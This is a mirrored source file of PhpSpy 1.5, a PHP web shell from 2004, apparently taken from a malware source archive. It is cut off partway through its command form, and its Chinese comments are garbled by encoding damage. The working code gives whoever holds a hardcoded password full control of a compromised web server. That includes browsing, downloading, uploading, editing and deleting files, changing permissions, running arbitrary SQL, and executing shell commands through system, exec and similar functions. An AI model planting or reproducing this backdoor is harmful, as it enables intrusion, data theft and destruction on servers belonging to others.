mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
810 lines
27 KiB
Plaintext
810 lines
27 KiB
Plaintext
|
<?php
|
|||
|
/*
|
|||
|
+--------------------------------------------------------------------------+
|
|||
|
| PhpSpy Version:1.5 |
|
|||
|
| Codz by Angel |
|
|||
|
| (c) 2004 Security Angel Team |
|
|||
|
| http://www.4ngel.net |
|
|||
|
| ======================================================================== |
|
|||
|
| Team: http://www.4ngel.net |
|
|||
|
| http://www.bugkidz.org |
|
|||
|
| Email: 4ngel@21cn.com |
|
|||
|
| Date: July 22st(My mother's birthday), 2004 |
|
|||
|
+--------------------------------------------------------------------------+
|
|||
|
*/
|
|||
|
error_reporting(7);
|
|||
|
ob_start();
|
|||
|
$mtime = explode(' ', microtime());
|
|||
|
$starttime = $mtime[1] + $mtime[0];
|
|||
|
|
|||
|
/*===================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> =====================*/
|
|||
|
|
|||
|
// <20>Ƿ<EFBFBD><C7B7><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤,1Ϊ<31><CEAA>Ҫ<EFBFBD><D2AA>֤,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊֱ<CEAA>ӽ<EFBFBD><D3BD><EFBFBD>.<2E><><EFBFBD><EFBFBD>ѡ<EFBFBD><D1A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ч
|
|||
|
$admin['check']="1";
|
|||
|
|
|||
|
// <20><>֤<EFBFBD><D6A4>ʽ,1Ϊ<31><CEAA><EFBFBD><EFBFBD> Session <20><>֤,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Cookie<69><65>֤
|
|||
|
// Ĭ<>ϲ<EFBFBD><CFB2><EFBFBD> Session <20><>֤,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>½,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ Cookie<69><65>֤
|
|||
|
$admin['checkmode']="1";
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤,<2C><><EFBFBD>ĵ<DEB8>½<EFBFBD><C2BD><EFBFBD><EFBFBD>
|
|||
|
$admin['pass']="hkuser";
|
|||
|
|
|||
|
/*===================== <20><><EFBFBD>ý<EFBFBD><C3BD><EFBFBD> =====================*/
|
|||
|
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> register_globals = off <20>Ļ<EFBFBD><C4BB><EFBFBD><EFBFBD>¹<EFBFBD><C2B9><EFBFBD>
|
|||
|
if ( function_exists('ini_get') ) {
|
|||
|
$onoff = ini_get('register_globals');
|
|||
|
} else {
|
|||
|
$onoff = get_cfg_var('register_globals');
|
|||
|
}
|
|||
|
if ($onoff != 1) {
|
|||
|
@extract($_POST, EXTR_SKIP);
|
|||
|
@extract($_GET, EXTR_SKIP);
|
|||
|
}
|
|||
|
|
|||
|
/*===================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤ =====================*/
|
|||
|
if($admin['check']=="1") {
|
|||
|
if($admin['checkmode']=="1") {
|
|||
|
/*------- session <20><>֤ -------*/
|
|||
|
session_start();
|
|||
|
if ($_GET['action'] == "logout") {
|
|||
|
session_destroy();
|
|||
|
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
|
|||
|
echo "<span style=\"font-size: 12px; font-family: Verdana\">ע<><D7A2><EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$_SERVER['PHP_SELF']."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6>˳<EFBFBD><CBB3><EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>>></a></span>";
|
|||
|
exit;
|
|||
|
}
|
|||
|
if ($_POST['action'] == "login") {
|
|||
|
$adminpass=trim($_POST['adminpass']);
|
|||
|
if ($adminpass==$admin['pass']) {
|
|||
|
$_SESSION['adminpass'] = $admin['pass'];
|
|||
|
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
|
|||
|
echo "<span style=\"font-size: 12px; font-family: Verdana\"><3E><>½<EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$_SERVER['PHP_SELF']."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD>ת<EFBFBD><EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>>></a></span>";
|
|||
|
exit;
|
|||
|
}
|
|||
|
}
|
|||
|
if (session_is_registered('adminpass')) {
|
|||
|
if ($_SESSION['adminpass']!=$admin['pass']) {
|
|||
|
loginpage();
|
|||
|
}
|
|||
|
} else {
|
|||
|
loginpage();
|
|||
|
}
|
|||
|
} else {
|
|||
|
/*------- cookie <20><>֤ -------*/
|
|||
|
if ($_GET['action'] == "logout") {
|
|||
|
setcookie ("adminpass", "");
|
|||
|
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
|
|||
|
echo "<span style=\"font-size: 12px; font-family: Verdana\">ע<><D7A2><EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$_SERVER['PHP_SELF']."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6>˳<EFBFBD><CBB3><EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>>></a></span>";
|
|||
|
exit;
|
|||
|
}
|
|||
|
if ($_POST['action'] == "login") {
|
|||
|
$adminpass=trim($_POST['adminpass']);
|
|||
|
if ($adminpass==$admin['pass']) {
|
|||
|
setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
|
|||
|
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
|
|||
|
echo "<span style=\"font-size: 12px; font-family: Verdana\"><3E><>½<EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$_SERVER['PHP_SELF']."\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD>ת<EFBFBD><EFBFBD><F2B5A5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>>></a></span>";
|
|||
|
exit;
|
|||
|
}
|
|||
|
}
|
|||
|
if (isset($_COOKIE['adminpass'])) {
|
|||
|
if ($_COOKIE['adminpass']!=$admin['pass']) {
|
|||
|
loginpage();
|
|||
|
}
|
|||
|
} else {
|
|||
|
loginpage();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
}//end check
|
|||
|
/*===================== <20><>֤<EFBFBD><D6A4><EFBFBD><EFBFBD> =====================*/
|
|||
|
|
|||
|
// <20>ж<EFBFBD> magic_quotes_gpc ״̬
|
|||
|
if (get_magic_quotes_gpc()) {
|
|||
|
$_GET = stripslashes_array($_GET);
|
|||
|
$_POST = stripslashes_array($_POST);
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
|
|||
|
if (!empty($downfile)) {
|
|||
|
if (!@file_exists($downfile)) {
|
|||
|
echo "<script>alert('<27><>Ҫ<EFBFBD>µ<EFBFBD><C2B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!')</script>";
|
|||
|
} else {
|
|||
|
$filename = basename($downfile);
|
|||
|
$filename_info = explode('.', $filename);
|
|||
|
$fileext = $filename_info[count($filename_info)-1];
|
|||
|
header('Content-type: application/x-'.$fileext);
|
|||
|
header('Content-Disposition: attachment; filename='.$filename);
|
|||
|
header('Content-Description: PHP3 Generated Data');
|
|||
|
@readfile($downfile);
|
|||
|
exit;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD>Ŀ¼(<28>ļ<EFBFBD>ϵͳ)
|
|||
|
$pathname=str_replace('\\','/',dirname(__FILE__));
|
|||
|
|
|||
|
// <20><>ȡ<EFBFBD><C8A1>ǰ·<C7B0><C2B7>
|
|||
|
if (!isset($dir) or empty($dir)) {
|
|||
|
$dir = ".";
|
|||
|
$nowpath = getPath($pathname, $dir);
|
|||
|
} else {
|
|||
|
$dir=$_GET['dir'];
|
|||
|
$nowpath = getPath($pathname, $dir);
|
|||
|
}
|
|||
|
|
|||
|
// <20>ж϶<D0B6>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
|
|||
|
if (dir_writeable($nowpath)) {
|
|||
|
$dir_writeable = "<22><>д";
|
|||
|
} else {
|
|||
|
$dir_writeable = "<22><><EFBFBD><EFBFBD>д";
|
|||
|
}
|
|||
|
|
|||
|
$dis_func = get_cfg_var("disable_functions");
|
|||
|
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : "";
|
|||
|
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShellģʽ</a>" : "";
|
|||
|
?>
|
|||
|
<html>
|
|||
|
<head>
|
|||
|
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
|
|||
|
<title>PhpSpy Ver 1.5</title>
|
|||
|
<style type="text/css">
|
|||
|
.maintable {
|
|||
|
background-color: "#FFFFFF";
|
|||
|
border: "1px solid #115173";
|
|||
|
}
|
|||
|
body,td {
|
|||
|
font-family: "sans-serif";
|
|||
|
font-size: "12px";
|
|||
|
line-height: "150%";
|
|||
|
}
|
|||
|
.INPUT {
|
|||
|
FONT-SIZE: "12px";
|
|||
|
COLOR: "#000000";
|
|||
|
BACKGROUND-COLOR: "#FFFFFF";
|
|||
|
height: "18px";
|
|||
|
border: "1px solid #666666";
|
|||
|
}
|
|||
|
a:link,
|
|||
|
a:visited,
|
|||
|
a:active{
|
|||
|
color: "#000000";
|
|||
|
text-decoration: underline;
|
|||
|
}
|
|||
|
a:hover{
|
|||
|
color: "#465584";
|
|||
|
text-decoration: none;
|
|||
|
}
|
|||
|
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
|
|||
|
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
|
|||
|
</style>
|
|||
|
</head>
|
|||
|
|
|||
|
<body style="table-layout:fixed; word-break:break-all">
|
|||
|
<center>
|
|||
|
<p><strong><a href="?action=logout">ע<><D7A2><EFBFBD>Ự</a> | <a href="?action=dir"><3E><><EFBFBD>ظ<EFBFBD>Ŀ¼</a> | <a href="?action=phpenv">PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL<51><4C>ѯ</a> | <a href="http://www.4ngel.net" target="_blank" title="<22><><EFBFBD>ش˳<D8B4><CBB3><EFBFBD>">Version 1.5</a></strong></p>
|
|||
|
<?php
|
|||
|
if ($_GET['action'] == "phpinfo") {
|
|||
|
$dis_func = get_cfg_var("disable_functions");
|
|||
|
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() <20><><EFBFBD><EFBFBD><EFBFBD>ѱ<EFBFBD><D1B1><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD>鿴<PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>";
|
|||
|
exit;
|
|||
|
}
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="0">
|
|||
|
<form action="" method="GET">
|
|||
|
<tr>
|
|||
|
<td><p><3E><><EFBFBD><EFBFBD>·<EFBFBD><C2B7>:<?=$pathname?><br><3E><>ǰĿ¼(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
|
|||
|
<br><3E><>תĿ¼:
|
|||
|
<input name="dir" type="text" class="INPUT">
|
|||
|
<input type="submit" class="INPUT" value="ȷ<><C8B7>"> <20><>֧<EFBFBD>־<EFBFBD><D6BE><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD>
|
|||
|
</p></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
|
|||
|
<tr>
|
|||
|
<td colspan="2"><3E>ϴ<EFBFBD><CFB4>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ǰĿ¼:
|
|||
|
<input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" class="INPUT" value="ȷ<><C8B7>">
|
|||
|
<input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
|
|||
|
<tr>
|
|||
|
<td colspan="2"><3E>½<EFBFBD><C2BD>ļ<EFBFBD><C4BC>ڵ<EFBFBD>ǰĿ¼:
|
|||
|
<input name="newfile" type="text" class="INPUT" value="">
|
|||
|
<input type="submit" class="INPUT" value="ȷ<><C8B7>">
|
|||
|
<input name="action" type="hidden" value="createfile"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
<form action="" method="POST">
|
|||
|
<tr>
|
|||
|
<td colspan="2"><3E>½<EFBFBD>Ŀ¼<C4BF>ڵ<EFBFBD>ǰĿ¼:
|
|||
|
<input name="newdirectory" type="text" class="INPUT" value="">
|
|||
|
<input type="submit" class="INPUT" value="ȷ<><C8B7>">
|
|||
|
<input name="action" type="hidden" value="createdirectory"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
</table>
|
|||
|
<hr width="760" noshade>
|
|||
|
<?php
|
|||
|
/*===================== ִ<>в<EFBFBD><D0B2><EFBFBD> <20><>ʼ =====================*/
|
|||
|
echo "<p><b>\n";
|
|||
|
// ɾ<><C9BE><EFBFBD>ļ<EFBFBD>
|
|||
|
if(@$delfile!="") {
|
|||
|
if(file_exists($delfile)) {
|
|||
|
@unlink($delfile);
|
|||
|
echo "".$delfile." ɾ<><C9BE><EFBFBD>ɹ<EFBFBD>!";
|
|||
|
} else {
|
|||
|
echo "<22>ļ<EFBFBD><C4BC>Ѳ<EFBFBD><D1B2><EFBFBD><EFBFBD><EFBFBD>,ɾ<><C9BE>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// ɾ<><C9BE>Ŀ¼
|
|||
|
elseif($_POST['action'] == "rmdir") {
|
|||
|
if($deldir!="") {
|
|||
|
$deldirs="$dir/$deldir";
|
|||
|
if(!file_exists("$deldirs")) {
|
|||
|
echo "Ŀ¼<C4BF>Ѳ<EFBFBD><D1B2><EFBFBD><EFBFBD><EFBFBD>!";
|
|||
|
} else {
|
|||
|
deltree($deldirs);
|
|||
|
}
|
|||
|
} else {
|
|||
|
echo "ɾ<><C9BE>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD>Ŀ¼
|
|||
|
elseif($_POST['action'] == "createdirectory") {
|
|||
|
if(!empty($newdirectory)) {
|
|||
|
$mkdirs="$dir/$newdirectory";
|
|||
|
if(file_exists("$mkdirs")) {
|
|||
|
echo "<22><>Ŀ¼<C4BF>Ѵ<EFBFBD><D1B4><EFBFBD>!";
|
|||
|
} else {
|
|||
|
echo $msg=@mkdir("$mkdirs",0777) ? "<22><><EFBFBD><EFBFBD>Ŀ¼<C4BF>ɹ<EFBFBD>!" : "<22><><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
@chmod("$mkdirs",0777);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// <20>ϴ<EFBFBD><CFB4>ļ<EFBFBD>
|
|||
|
elseif($_POST['action'] == "uploadfile") {
|
|||
|
echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "<22>ϴ<EFBFBD><CFB4>ɹ<EFBFBD>!" : "<22>ϴ<EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
}
|
|||
|
|
|||
|
// <20>༭<EFBFBD>ļ<EFBFBD>
|
|||
|
elseif($_POST['action'] == "doeditfile") {
|
|||
|
$filename="$dir/$editfilename";
|
|||
|
@$fp=fopen("$filename","w");
|
|||
|
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "д<><D0B4><EFBFBD>ļ<EFBFBD><C4BC>ɹ<EFBFBD>!" : "д<><D0B4>ʧ<EFBFBD><CAA7>!";
|
|||
|
@fclose($fp);
|
|||
|
}
|
|||
|
|
|||
|
// <20>༭<EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
elseif($_POST['action'] == "editfileperm") {
|
|||
|
$fileperm=base_convert($_POST['fileperm'],8,10);
|
|||
|
echo $msg=@chmod($dir."/".$file,$fileperm) ? "<22><><EFBFBD><EFBFBD><EFBFBD>ijɹ<C4B3>!" : "<22><EFBFBD>ʧ<EFBFBD><CAA7>!";
|
|||
|
echo " [".$file."] <20>ĺ<DEB8><C4BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
|
|||
|
}
|
|||
|
|
|||
|
// <20><><EFBFBD><EFBFBD>MYSQL
|
|||
|
elseif($connect) {
|
|||
|
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
|
|||
|
echo "<22><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD>ӳɹ<D3B3>!";
|
|||
|
} else {
|
|||
|
echo mysql_error();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// ִ<><D6B4>SQL<51><4C><EFBFBD><EFBFBD>
|
|||
|
elseif($doquery) {
|
|||
|
@mysql_connect($servername,$dbusername,$dbpassword) or die("<22><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>");
|
|||
|
@mysql_select_db($dbname) or die("ѡ<><D1A1><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>ʧ<EFBFBD><CAA7>");
|
|||
|
$result = @mysql_query($_POST['sql_query']);
|
|||
|
if ($result) {
|
|||
|
echo "SQL<51><4C><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>ִ<EFBFBD><D6B4>";
|
|||
|
}else{
|
|||
|
echo "<22><><EFBFBD><EFBFBD>: ".mysql_error();
|
|||
|
}
|
|||
|
mysql_close();
|
|||
|
}
|
|||
|
|
|||
|
// <20>鿴PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>״<EFBFBD><D7B4>
|
|||
|
elseif($_POST['action'] == "viewphpvar") {
|
|||
|
echo "<22><><EFBFBD>ò<EFBFBD><C3B2><EFBFBD> ".$_POST['phpvarname']." <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: ".getphpcfg($_POST['phpvarname'])."";
|
|||
|
}
|
|||
|
|
|||
|
else {
|
|||
|
echo "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Security Angel <20><>ȫ<EFBFBD><C8AB>֯ angel[BST] <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD> <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>°汾.";
|
|||
|
}
|
|||
|
|
|||
|
echo "</b></p>\n";
|
|||
|
/*===================== ִ<>в<EFBFBD><D0B2><EFBFBD> <20><><EFBFBD><EFBFBD> =====================*/
|
|||
|
|
|||
|
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<tr bgcolor="#cccccc">
|
|||
|
<td align="center" nowrap width="40%"><b><3E>ļ<EFBFBD></b></td>
|
|||
|
<td align="center" nowrap width="20%"><b><3E><EFBFBD><DEB8><EFBFBD><EFBFBD><EFBFBD></b></td>
|
|||
|
<td align="center" nowrap width="12%"><b><3E><>С</b></td>
|
|||
|
<td align="center" nowrap width="8%"><b><3E><><EFBFBD><EFBFBD></b></td>
|
|||
|
<td align="center" nowrap width="20%"><b><3E><><EFBFBD><EFBFBD></b></td>
|
|||
|
</tr>
|
|||
|
<?php
|
|||
|
// Ŀ¼<C4BF>б<EFBFBD>
|
|||
|
$dirs=@opendir($dir);
|
|||
|
while ($file=@readdir($dirs)) {
|
|||
|
$b="$dir/$file";
|
|||
|
$a=@is_dir($b);
|
|||
|
if($a=="1"){
|
|||
|
if($file!=".."&&$file!=".") {
|
|||
|
$lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file"));
|
|||
|
$dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
|
|||
|
echo "<tr class=".getrowbg().">\n";
|
|||
|
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap valign=\"top\"><dir></td>\n";
|
|||
|
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
|
|||
|
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">ɾ<><C9BE></a></td>\n";
|
|||
|
echo "</tr>\n";
|
|||
|
} else {
|
|||
|
if($file=="..") {
|
|||
|
echo "<tr class=".getrowbg().">\n";
|
|||
|
echo " <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\"><3E><><EFBFBD><EFBFBD><EFBFBD>ϼ<EFBFBD>Ŀ¼</a></td>\n";
|
|||
|
echo "</tr>\n";
|
|||
|
}
|
|||
|
}
|
|||
|
$dir_i++;
|
|||
|
}
|
|||
|
}//while
|
|||
|
@closedir($dirs);
|
|||
|
|
|||
|
// <20>ļ<EFBFBD><C4BC>б<EFBFBD>
|
|||
|
$dirs=@opendir($dir);
|
|||
|
while ($file=@readdir($dirs)) {
|
|||
|
$b="$dir/$file";
|
|||
|
$a=@is_dir($b);
|
|||
|
if($a=="0"){
|
|||
|
$size=@filesize("$dir/$file");
|
|||
|
$size=$size/1024 ;
|
|||
|
$size= @number_format($size, 3);
|
|||
|
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
|
|||
|
@$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
|
|||
|
echo "<tr class=".getrowbg().">\n";
|
|||
|
echo " <td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>\n";
|
|||
|
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n";
|
|||
|
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
|
|||
|
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\"><3E><><EFBFBD><EFBFBD></a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\"><3E>༭</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">ɾ<><C9BE></a></td>\n";
|
|||
|
echo "</tr>\n";
|
|||
|
$file_i++;
|
|||
|
}
|
|||
|
}
|
|||
|
@closedir($dirs);
|
|||
|
|
|||
|
echo "<tr class=".getrowbg().">\n";
|
|||
|
echo " <td nowrap colspan=\"5\" align=\"right\">".$dir_i." <20><>Ŀ¼<br>".$file_i." <20><><EFBFBD>ļ<EFBFBD></td>\n";
|
|||
|
echo "</tr>\n";
|
|||
|
?>
|
|||
|
</table>
|
|||
|
|
|||
|
<?php
|
|||
|
}// end dir
|
|||
|
|
|||
|
elseif ($_GET['action'] == "editfile") {
|
|||
|
if($newfile=="") {
|
|||
|
$filename="$dir/$editfile";
|
|||
|
$fp=@fopen($filename,"r");
|
|||
|
$contents=@fread($fp, filesize($filename));
|
|||
|
@fclose($fp);
|
|||
|
$contents=htmlspecialchars($contents);
|
|||
|
}else{
|
|||
|
$editfile=$newfile;
|
|||
|
$filename = "$dir/$editfile";
|
|||
|
}
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center"><3E>½<EFBFBD>/<2F>༭<EFBFBD>ļ<EFBFBD> [<a href="?dir=<?=urlencode($dir)?>"><3E><><EFBFBD><EFBFBD></a>]</td>
|
|||
|
</tr>
|
|||
|
<form action="?dir=<?=urlencode($dir)?>" method="POST">
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><3E><>ǰ<EFBFBD>ļ<EFBFBD>:<input class="input" type="text" name="editfilename" size="30"
|
|||
|
value="<?=$editfile?>"> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></td>
|
|||
|
</tr>
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
|
|||
|
</tr>
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><input type="submit" value="ȷ<><C8B7>д<EFBFBD><D0B4>" class="input">
|
|||
|
<input name="action" type="hidden" value="doeditfile">
|
|||
|
<input type="reset" value="<22><><EFBFBD><EFBFBD>" class="input"></td>
|
|||
|
</tr>
|
|||
|
</form>
|
|||
|
</table>
|
|||
|
<?php
|
|||
|
}//end editfile
|
|||
|
|
|||
|
elseif ($_GET['action'] == "shell") {
|
|||
|
if (!get_cfg_var("safe_mode")) {
|
|||
|
?>
|
|||
|
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center">WebShell Mode</td>
|
|||
|
</tr>
|
|||
|
<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
|
|||
|
<tr class="secondalt">
|
|||
|
<td align="center"><3E><>ʾ:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȫ,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD>ļ<EFBFBD>.<2E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Եõ<D4B5>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.</td>
|
|||
|
</tr>
|
|||
|
<tr class="firstalt">
|
|||
|
<td align="center">
|
|||
|
ѡ<><D1A1>ִ<EFBFBD>к<EFBFBD><D0BA><EFBFBD>:
|
|||
|
<select name="execfunc" class="input">
|
|||
|
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
|
|||
|
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
|
|||
|
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
|
|||
|
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
|
|||
|
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
|
|||
|
</select><3E><>
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
<input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
|
|||
|
<input type="submit" value="execute" class="input"></td>
|
|||
|
</tr>
|
|||
|
